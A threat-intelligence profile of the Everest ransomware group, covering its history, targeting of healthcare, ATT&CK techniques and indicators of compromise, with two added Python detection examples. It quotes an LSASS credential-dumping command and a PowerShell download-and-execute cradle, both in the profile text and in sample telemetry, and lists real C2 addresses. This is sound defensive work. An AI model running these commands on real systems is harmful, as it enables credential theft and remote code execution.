Threat Actor: Everest

Threat Level: 7
Emergence Date: Dec 2020
Category: Closed Group
Affiliations:

Code-level connection to BlackByte ransomware family (medium-high confidence); operational collaboration with Ransomed ransomware group documented September 2023; member of EverBe 2.0 ransomware family lineage.

Description

Everest emerged in December 2020 as a Russian-speaking data-extortion operation and moved to full ransomware with dual AES/DES encryption by early 2021. Distinguishing features: a hybrid ransomware plus Initial Access Broker (IAB) model since November 2021, and corporate insider recruitment offering cash or profit-sharing since October 2023. Binary analysis shows code connections to the BlackByte ransomware family.

Criticality: Assesses the importance of the potential target, including its size/scale, the value of its data, and operational impact.
Lethality: Evaluates the potential for damage from an attack, including the ability to disrupt operations, cause financial loss, and damage public brand image.
Aggressiveness: Assesses the psychological and tactical intensity of the group's behaviour, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Closed Group with Initial Access Broker services and corporate insider recruitment operations

Everest operates a hybrid model combining direct ransomware with network access brokerage. IAB activities emerged November 2021, selling compromised credentials to other threat actors. The October 2023 insider recruitment program offers cash payments and profit-sharing for remote access. Binary analysis reveals code connections to BlackByte ransomware family's C# variant with local encryption key generation. Historical links to EverBe 2.0 ransomware family.

Current Status: Active as of October 2025, with leak-site claims against critical infrastructure including a national electricity transmission operator, aviation systems serving multiple European airports, and telecommunications networks; these claims are unverified.


Origins and Methodology

Everest has sustained roughly five years of operations on a hybrid model: ransomware, IAB services since November 2021, and insider recruitment since October 2023, giving it three distinct revenue streams. In April 2025 the group's dark web leak site was defaced with the message "Don't do crime CRIME IS BAD xoxo from Prague", possibly by the rival group DragonForce, though attribution remains speculative. Operations recovered by mid-2025.

Technical operations rely on legitimate tools: Cobalt Strike, ProcDump, SoftPerfect Network Scanner, WinRAR, AnyDesk, Splashtop and Atera. The defining characteristic is systematic deletion of each tool once its stage is complete. The BlackByte code connection shows in encryption keys being generated locally on the victim host rather than distributed from a server.

What is the Evolution of Everest Ransomware?
Formation

Initial emergence December 2020 focused on data exfiltration without encryption, primarily targeting Canadian organizations. Early operations established reconnaissance methodologies, credential harvesting using ProcDump against LSASS, and WinRAR-based data archiving.

Transition to full ransomware occurred in early 2021 with dual AES/DES encryption and double extortion. Russia-based attribution rests on Russian-language operations and targeting patterns that avoid post-Soviet states.

Evolution

Initial months concentrated on data exfiltration capabilities and dark web leak site infrastructure. The voluntary takedown of the leak site in May 2021, during a broader law enforcement crackdown on ransomware, was an operational security adjustment; operations resumed in mid-2021 with a reduced profile.

The November 2021 pivot to IAB services marked a business-model evolution, with a substantial uptick from November 2022, diversifying revenue through network access sales. In October 2023 an insider recruitment program launched on dark web forums, offering cash or profit-sharing for employee-provided access to organizations in the US, Canada and Europe.

Operations since 2024 show a shift toward data-only extortion without encryption.

Critical infrastructure claims, September to October 2025: in October Everest claimed on its leak site to have compromised aviation systems serving Heathrow, Brussels and Berlin airports during the September 2025 disruptions. The group also claimed October 2025 attacks on the Swedish national electricity grid operator and on telecommunications networks. None of these claims had been verified by independent sources as of October 2025.

Lineage/Connections

Code analysis reveals a relationship to the BlackByte ransomware family's C# variant. The key shared architectural feature is local encryption-key generation on compromised hosts rather than download of keys from C2 servers.

Early file extension patterns (.[everest@airmail.cc].EVEREST) connect Everest to the EverBe 2.0 ransomware family (Embrace, PainLocker, EvilLocker and Hyena Locker variants). A joint victim announcement with the Ransomed ransomware group followed in September 2023.

Which Unique Techniques Does Everest Use?

Attack chains begin with one of three primary initial access methods: exploiting exposed RDP services, purchasing credentials from other Initial Access Brokers, or leveraging the corporate insider recruitment program active since October 2023 (phishing, vulnerable VPN endpoints and unpatched public-facing applications are also reported). No specific CVE exploitation has been observed. Target selection concentrates on US healthcare entities, particularly medical imaging providers, who are given 24-hour negotiation deadlines.

Infection Vectors: Internet-exposed RDP without MFA; vulnerable VPN endpoints; credentials purchased from Initial Access Brokers; corporate insider recruitment with cash payments since October 2023; phishing; unpatched public-facing applications.

Target Selection: United States (over one-third of victims), Europe, and an emerging Middle East footprint; healthcare disproportionately targeted (over one-quarter of US victims); financial services, legal services, construction, government, manufacturing, aviation; organizations holding HIPAA- and GDPR-protected data.

Operational Complexity: Specific toolkit of Cobalt Strike, ProcDump, SoftPerfect Network Scanner, WinRAR, AnyDesk, Splashtop and Atera; complete tool deletion after each stage; local key generation inherited from the BlackByte lineage; three remote access tools installed as Windows services.

Key Features & Technical Details

Windows-focused C# ransomware with dual encryption algorithms and local key generation. No public decryption tool is available.

Encryption Method: Dual-algorithm implementation combining AES (Advanced Encryption Standard) and DES (Data Encryption Standard), with keys generated locally on the compromised host so that encryption does not depend on C2 connectivity; keys are not transmitted to external servers during encryption, which complicates recovery.

File Extension: .EVEREST or .everest appended to encrypted files; historical variants used longer extensions such as .[everest@airmail.cc].EVEREST, which tie the family to the EverBe 2.0 lineage.

Ransom Note: EVEREST LOCKER .txt delivered as the primary ransom note, in English; some variants drop files with Chinese Unicode names; displayed via pop-up windows or text files on desktops and in folders containing encrypted files; 24-hour negotiation deadlines, particularly for healthcare targets, exploit operational urgency.

Double Extortion: Pre-encryption data exfiltration using WinRAR archiving and Splashtop file transfer; dark web leak site for victim naming and publication of stolen data, with countdown timers; staged releases (proof samples, partial leaks, full dumps); increasing shift toward data-only extortion without encryption, threatening publication or sale while avoiding the complexity of ransomware deployment.

Communication Channels: Cobalt Strike beacons over HTTP/HTTPS on ports 8080 (stager hosting) and 10443 (C2) for primary C2 (the IOCs below record these as plain HTTP URLs); secondary channels through installed remote access tools (AnyDesk, Splashtop, Atera); dark web leak site reachable over Tor for victim negotiations and data publication; direct negotiation channels provided in ransom notes.

Deployment Speed: Multi-stage execution spanning reconnaissance, credential harvesting, lateral movement and data exfiltration before encryption; typical dwell time ranges from days to weeks, enabling full network mapping and identification of high-value data; 24-hour negotiation deadlines follow encryption, particularly in the healthcare sector.

Payment Method: Cryptocurrency, with a preference for Monero (XMR) over Bitcoin (BTC) for its privacy properties; reportedly charges a premium for Bitcoin payments to compensate for traceability risk; wallet addresses rotate per incident and are provided directly to victims through negotiation channels.

Operational Model: Closed group with multiple revenue streams: ransom payments for decryption, non-disclosure extortion, direct data sales on dark web markets (documented prices from tens of thousands to hundreds of thousands in cryptocurrency), network access brokerage to other ransomware operators and threat actors since November 2021, and corporate insider recruitment with profit-sharing arrangements since October 2023.

Activities

Sustained tempo across five years of operation. Claimed responsibility (October 2025) for September 2025 aviation system compromises affecting Heathrow, Brussels and Berlin airports. October 2025 brought further claimed attacks against the Swedish national power grid operator and telecommunications networks; these claims remain unverified. The United States represents over one-third of victims; Europe and an emerging Middle East footprint (UAE, Saudi Arabia, Gulf states) are additional hotspots.

Which Industries Are Most Vulnerable to Everest?

Healthcare is disproportionately targeted, representing over one-quarter of US victims. The group specifically targets medical imaging providers with 24-hour deadlines that exploit patient-care urgency and HIPAA pressure. Additional sectors: financial services, legal and professional services, construction, government and public sector, manufacturing, technology, retail, aviation and aerospace, energy and utilities.

Modus Operandi

Multi-stage attack chains begin with opportunistic initial access followed by reconnaissance, credential harvesting, lateral movement, data exfiltration, and selective encryption deployment or data-only extortion.

Initial Access

External Remote Services (T1133) targeting internet-exposed RDP without MFA and vulnerable VPN endpoints. No specific CVE exploitation.

Valid Accounts (T1078) via three methods: credentials purchased from other IABs (Everest itself has operated in the access-broker market since November 2021), credential stuffing, and corporate insider recruitment (since October 2023) offering cash or profit-sharing for direct network access to organizations in the US, Canada and Europe.

Discovery

Network Service Discovery (T1046) using netscan.exe, netscanpack.exe, and SoftPerfect Network Scanner to enumerate topology, identify domain controllers/file servers, scan ports, discover shares, and retrieve device information via WMI, SNMP, HTTP, SSH, PowerShell.

Output consistently saved as subnets.txt and trustdumps.txt in C:\Users\Public\Downloads\ before deletion.

Persistence (Remote Access Software)

Remote Access Software (T1219) consistently installing three tools across all operations: AnyDesk, Splashtop, Atera as Windows services. Triple-redundancy ensures persistence via service autostart and provides backup C2 independent of Cobalt Strike.

Defense Evasion

Indicator Removal (T1070.004) defines operations: systematic removal of all tools after each execution stage.

SoftPerfect Network Scanner deleted after reconnaissance, subnets.txt/trustdumps.txt after processing, WinRAR archives after exfiltration, ProcDump and LSASS dumps after credential extraction. Stage-by-stage cleanup distinguishes from groups leaving artifacts throughout attack chains.

Credential Access

OS Credential Dumping: LSASS Memory (T1003.001) using ProcDump with a consistent command: C:\Users\<user>\Desktop\procdump64.exe -ma lsass.exe C:\Users\<user>\Desktop\lsass<domain>.dmp. Dumps are saved to user desktops with domain-specific naming and parsed offline for plaintext passwords, NTLM hashes and Kerberos tickets.

OS Credential Dumping: NTDS (T1003.003) copying NTDS.dit Active Directory database, consistently packaged as ntds.dit.zip for offline extraction.

Command and Control

Application Layer Protocol (T1071.001) with Cobalt Strike over HTTP/HTTPS on ports 8080 (beacon/stager hosting) and 10443 (C2). Beacon deployment via a PowerShell download cradle: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('<IP Address>/a')). Historical infrastructure: AWS EC2 addresses 3.22.79.23 and 18.193.71.144 for Cobalt Strike, and the European-hosted 45.84.0.164 serving a Meterpreter C2 on port 10443.

Remote Access Software (T1219) providing backup C2 via AnyDesk, Splashtop, Atera.

Lateral Movement

Remote Services utilizing Remote Desktop Protocol (T1021.001) with compromised legitimate user accounts for network traversal. RDP lateral movement exploits inadequate network segmentation and excessive user privileges.

Exfiltration

Exfiltration Over C2 Channel (T1041) using Splashtop file transfer specifically (not other remote access tools). WinRAR archives data before Splashtop transfer. Pre-encryption exfiltration enables data-only extortion. Documented targets: medical records (healthcare), customer data (financial services), legal documents (law firms), intellectual property (manufacturing).

Persistence (Windows Services)

Create or Modify System Process targeting Windows Service (T1543.003) installing remote desktop software tools including AnyDesk, Splashtop Remote Desktop, and Atera as Windows services. Service-based persistence ensures automatic startup across system reboots and survives intermediate remediation efforts.

Impact

Data encryption disrupts operations requiring restoration. Healthcare faces elevated impact: patient care interruption, appointment cancellations, medical device unavailability, and patient safety risks. Data exfiltration creates regulatory consequences: HIPAA penalties (healthcare), GDPR enforcement (Europe), notification requirements, litigation.

Financial impact beyond ransoms: restoration costs, business interruption, regulatory penalties, legal expenses, insurance premium increases. Downtime: days to weeks depending on backups.

Impact (Data Encrypted)

Data Encrypted for Impact (T1486) deploying dual AES/DES with .EVEREST or .everest extension. Defining characteristic from BlackByte lineage: local key generation on each host (not downloaded from C2 servers), ensuring encryption survives infrastructure disruption. Ransom note: EVEREST LOCKER .txt. Operational shift since 2024 toward data-only extortion without encryption.

Impact (Extortion)

Double extortion: encryption + pre-exfiltration data theft threatening dark web publication. Pressure mechanisms: staged releases (proof samples → partial → full), countdown timers, regulatory agency threats.

Healthcare-specific tactic: 24-hour deadlines for healthcare targets (documented across medical imaging attacks) exploiting patient care dependencies and HIPAA penalties. This compressed timeline distinguishes healthcare from other sectors. Recent operations: password-protected dark web postings.

Defense Evasion (Cleanup)

Stage-by-stage deletion distinguishes operations. After reconnaissance: netscan.exe, netscanpack.exe, SoftPerfect Network Scanner removed. After processing: subnets.txt, trustdumps.txt deleted from C:\Users\Public\Downloads. After exfiltration: WinRAR archives removed. After credential harvesting: ProcDump, LSASS dumps deleted from user desktops. Cleanup occurs after each stage, not at attack conclusion.
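The Modus Operandi above describes behaviours that survive the group's stage-by-stage cleanup because they leave process, service and file-create/delete telemetry: ProcDump with -ma against lsass.exe, the PowerShell IEX/DownloadString cradle, SoftPerfect Network Scanner, three remote access tools installed as services, and recon output in C:\Users\Public\Downloads that exists only for minutes. The Python below is an added example written for this profile, not code from the original page or from any vendor tool. The Event schema (ts, event_id, image, command_line, target), the use of Sysmon IDs 1/11/23 and System log 7045 as the record types, the 10-minute cleanup window, and the SAMPLE_EVENTS (including the TEST-NET-1 address 192.0.2.10) are assumptions constructed for the illustration.

```python
"""Behavioural hunt for the Everest tradecraft described in the Modus Operandi.

Added example for this profile; not code from the original page or any vendor.
Events are CONSTRUCTED Sysmon/System-log style records with assumed field names.
A real hunt would feed Sysmon or EDR telemetry into hunt() instead of SAMPLE_EVENTS.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class Event:
    ts: float               # seconds since epoch (constructed)
    event_id: int           # 1 = process create, 11 = file create, 23 = file delete (Sysmon);
                            # 7045 = service installed (Windows System log)
    image: str = ""         # process image path, or service binary for 7045
    command_line: str = ""  # process command line (event 1 only)
    target: str = ""        # file path (11/23) or service name (7045)


RAT_SERVICES = ("anydesk", "splashtop", "atera")
RECON_OUTPUTS = {
    r"c:\users\public\downloads\subnets.txt",
    r"c:\users\public\downloads\trustdumps.txt",
}
SHORT_LIVED_SECS = 600.0  # assumed window: recon output deleted within 10 minutes of creation
CRADLE = re.compile(r"iex\s*\(.*downloadstring\(")       # matched against lowercased command line
NETSCAN = re.compile(r"\\netscan(pack)?\.exe$")           # matched against lowercased image path


def hunt(events):
    """Return (technique_id, description, evidence) tuples for Everest-like behaviour."""
    alerts = []
    created_at = {}    # lowercased path -> creation timestamp, for create/delete correlation
    rats_seen = set()  # distinct remote access tools installed as services

    for e in sorted(events, key=lambda ev: ev.ts):
        img = e.image.lower()
        cl = e.command_line.lower()
        if e.event_id == 1:
            # ProcDump full memory dump (-ma) of lsass.exe
            if "procdump" in img and "lsass" in cl and "-ma" in cl.split():
                alerts.append(("T1003.001", "ProcDump full dump of lsass.exe", e.command_line))
            # PowerShell download cradle used to pull the Cobalt Strike stager
            if "powershell" in img and CRADLE.search(cl):
                alerts.append(("T1071.001", "PowerShell IEX/DownloadString cradle", e.command_line))
            if NETSCAN.search(img):
                alerts.append(("T1046", "SoftPerfect Network Scanner executed", e.image))
        elif e.event_id == 7045:
            hit = next((r for r in RAT_SERVICES if r in e.target.lower() or r in img), None)
            if hit:
                rats_seen.add(hit)
                alerts.append(("T1543.003", f"Remote access tool installed as service: {e.target}", e.image))
        elif e.event_id == 11:
            created_at[e.target.lower()] = e.ts
        elif e.event_id == 23:
            path = e.target.lower()
            # Stage-by-stage cleanup: the artifact exists only briefly, so alert on the
            # create->delete pair rather than on the file being present at scan time.
            if path in RECON_OUTPUTS and path in created_at and e.ts - created_at[path] <= SHORT_LIVED_SECS:
                alerts.append(("T1070.004", "Recon output created then deleted within minutes", e.target))

    # Triple-redundant remote access is the distinctive pattern; two or more is worth a look.
    if len(rats_seen) >= 2:
        alerts.append(("T1219", f"{len(rats_seen)} distinct remote access tools installed as services: "
                                + ", ".join(sorted(rats_seen)), ""))
    return alerts


def by_technique(alerts):
    """Count alerts per ATT&CK technique ID."""
    return Counter(a[0] for a in alerts)


# Constructed sample telemetry; 192.0.2.10 is a documentation (TEST-NET-1) address, not a real IOC.
SAMPLE_EVENTS = [
    Event(1000.0, 1, r"C:\Users\Public\Downloads\netscan.exe", "netscan.exe"),
    Event(1010.0, 11, target=r"C:\Users\Public\Downloads\subnets.txt"),
    Event(1300.0, 23, target=r"C:\Users\Public\Downloads\subnets.txt"),
    Event(2000.0, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.0.2.10:8080/a'))"),
    Event(3000.0, 1, r"C:\Users\bob\Desktop\procdump64.exe",
          r"C:\Users\bob\Desktop\procdump64.exe -ma lsass.exe C:\Users\bob\Desktop\lsass_corp.dmp"),
    Event(4000.0, 7045, r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe --service", target="AnyDesk Service"),
    Event(4100.0, 7045, r"C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe",
          target="SplashtopRemoteService"),
    Event(4200.0, 7045, r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe", target="AteraAgent"),
    Event(5000.0, 11, target=r"C:\Users\Public\Downloads\report.pdf"),  # benign: never deleted
]

if __name__ == "__main__":
    for tid, desc, evidence in hunt(SAMPLE_EVENTS):
        print(f"{tid:10} {desc}  [{evidence}]")
```

The create/delete correlation is the part worth copying: because Everest removes subnets.txt and trustdumps.txt as soon as they are processed, a scan for files on disk will miss them, while a Sysmon 11 followed by a Sysmon 23 on the same path within minutes is a strong signal.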

Indicators of Compromise (IOCs)

Network and host-based indicators enable detection across compromised environments.


File Hashes

SHA256: f6ed1ce91192dc068151025cd1ca8efd3ba68d035c92a540bf693aa2e217df0e (primary ransomware payload, 39,936 bytes, PE32 executable, UPX compression)
MD5: 88c7bbbd73caa66b7d6d1056cf5204dc (primary payload)
SHA1: f765e0b79ec2c0b0639631403fd9c1472898ac48 (primary payload)

IP Addresses

3.22.79.23 (Cobalt Strike beacon hosting on port 8080, C2 communications on port 10443)
18.193.71.144 (Cobalt Strike C2 on port 10443)
45.84.0.164 (Meterpreter C2 on port 10443)

Domains/URLs

hxxp://3.22.79[.]23:8080/ (Cobalt Strike beacon hosting)
hxxp://3.22.79[.]23:8080/a (Cobalt Strike beacon endpoint)
hxxp://3.22.79[.]23:10443/ga.js (Cobalt Strike C2 communication)
hxxp://18.193.71[.]144:10443/match (Cobalt Strike C2 communication)
hxxp://45.84.0[.]164:10443/o6mJ (Meterpreter C2 endpoint)

File Paths

C:\Users\<user>\Desktop\procdump64.exe or C:\Users\<user>\Desktop\procdump.exe (LSASS credential dumping)
C:\Users\<user>\Desktop\lsass<domain>.dmp or C:\Users\<user>\Desktop\lsass.dmp (LSASS memory dumps)
C:\Users\Public\Downloads\subnets.txt (network reconnaissance output)
C:\Users\Public\Downloads\trustdumps.txt (Active Directory trust enumeration output)
C:\Users\Public\l.exe (Metasploit payload)
Windows service installations at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ for AnyDesk, Splashtop, Atera

File Extensions

.EVEREST or .everest (primary encrypted file extension)
.[everest@airmail.cc].EVEREST (historical variant)
EVEREST LOCKER .txt (ransom note filename)
ntds.dit.zip (archived Active Directory database)
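The indicators above are published defanged (hxxp, [.]), so a matcher has to refang them before comparing against real proxy, EDR or file-server logs; the hash indicators are exact-match and brittle, since a repacked or recompiled payload will not hit them, while the file-extension and ransom-note patterns catch the impact stage regardless of sample. The Python below is an added example written for this profile, not code from the original page or any vendor feed. The IOC values are copied from the table above; the record schema (host, url, dst_ip, sha256, sha1, md5, path) and the SAMPLE_RECORDS (using the TEST-NET-2 address 198.51.100.7 as benign noise) are constructed for the illustration.

```python
"""Refang-and-match the Everest IOCs listed above against log records.

Added example for this profile; not code from the original page or any vendor.
IOC values come from the IOC table; SAMPLE_RECORDS and the record schema are CONSTRUCTED.
"""
import re
from collections import defaultdict

# Defanged exactly as published in the IOC table above.
DEFANGED_URLS = [
    "hxxp://3.22.79[.]23:8080/",
    "hxxp://3.22.79[.]23:8080/a",
    "hxxp://3.22.79[.]23:10443/ga.js",
    "hxxp://18.193.71[.]144:10443/match",
    "hxxp://45.84.0[.]164:10443/o6mJ",
]
IOC_IPS = {"3.22.79.23", "18.193.71.144", "45.84.0.164"}
IOC_SHA256 = {"f6ed1ce91192dc068151025cd1ca8efd3ba68d035c92a540bf693aa2e217df0e"}
IOC_SHA1 = {"f765e0b79ec2c0b0639631403fd9c1472898ac48"}
IOC_MD5 = {"88c7bbbd73caa66b7d6d1056cf5204dc"}
# .EVEREST / .everest, plus the historical .[everest@airmail.cc].EVEREST form
ENCRYPTED_EXT = re.compile(r"\.(\[everest@airmail\.cc\]\.)?everest$", re.I)
RANSOM_NOTE = "everest locker .txt"


def refang(ioc):
    """Undo common defanging (hxxp, [.], (.), [:]) so the IOC compares equal to real log values."""
    return (ioc.replace("hxxps://", "https://").replace("hxxp://", "http://")
               .replace("[.]", ".").replace("(.)", ".").replace("[:]", ":"))


IOC_URLS = {refang(u) for u in DEFANGED_URLS}


def match_record(rec):
    """Return (ioc_type, value) hits for one log record (dict with optional keys)."""
    hits = []
    url = rec.get("url", "")
    if url in IOC_URLS:
        hits.append(("url", url))
    if rec.get("dst_ip") in IOC_IPS:
        hits.append(("ip", rec["dst_ip"]))
    # Hash IOCs are exact-match and fragile: a repacked payload will not hit them.
    for field, known in (("sha256", IOC_SHA256), ("sha1", IOC_SHA1), ("md5", IOC_MD5)):
        if rec.get(field, "").lower() in known:
            hits.append((field, rec[field].lower()))
    path = rec.get("path", "")
    if ENCRYPTED_EXT.search(path):
        hits.append(("encrypted_extension", path))
    if path.lower().endswith(RANSOM_NOTE):
        hits.append(("ransom_note", path))
    return hits


def scan(records):
    """Return {host: [(ioc_type, value), ...]} for every host with at least one hit."""
    per_host = defaultdict(list)
    for rec in records:
        for hit in match_record(rec):
            per_host[rec.get("host", "?")].append(hit)
    return dict(per_host)


# Constructed records: a stager fetch, benign browsing, a hash sighting, and file-server activity.
SAMPLE_RECORDS = [
    {"host": "ws01", "url": "http://3.22.79.23:8080/a", "dst_ip": "3.22.79.23"},
    {"host": "ws01", "url": "http://198.51.100.7/index.html", "dst_ip": "198.51.100.7"},
    {"host": "ws02", "sha256": "F6ED1CE91192DC068151025CD1CA8EFD3BA68D035C92A540BF693AA2E217DF0E"},
    {"host": "fs01", "path": r"\\fs01\share\finance\Q3-report.xlsx.EVEREST"},
    {"host": "fs01", "path": r"\\fs01\share\finance\budget.docx.[everest@airmail.cc].EVEREST"},
    {"host": "fs01", "path": r"\\fs01\share\finance\EVEREST LOCKER .txt"},
    {"host": "ws03", "path": r"C:\Users\alice\Documents\notes.txt"},
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_RECORDS).items():
        print(host, hits)
```

Hash comparison is done case-insensitively because EDR products disagree on hex case; the URL match is exact, so a stager fetched as http://3.22.79.23:8080/A would not hit and a production matcher should normalise the path component as well.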

Exploits and Vulnerabilities

No specific CVE exploitation. Initial access relies on common misconfigurations.

Additional Attack Vectors:

Exposed Remote Services: Internet-exposed RDP, VPN without MFA via T1133.

Weak Authentication: Inadequate passwords, missing MFA via T1078.

Unpatched Applications: Outdated internet-facing software via T1190.

Purchased Access: Compromised credentials from dark web.

Corporate Insiders: Cash/profit-sharing recruitment since October 2023.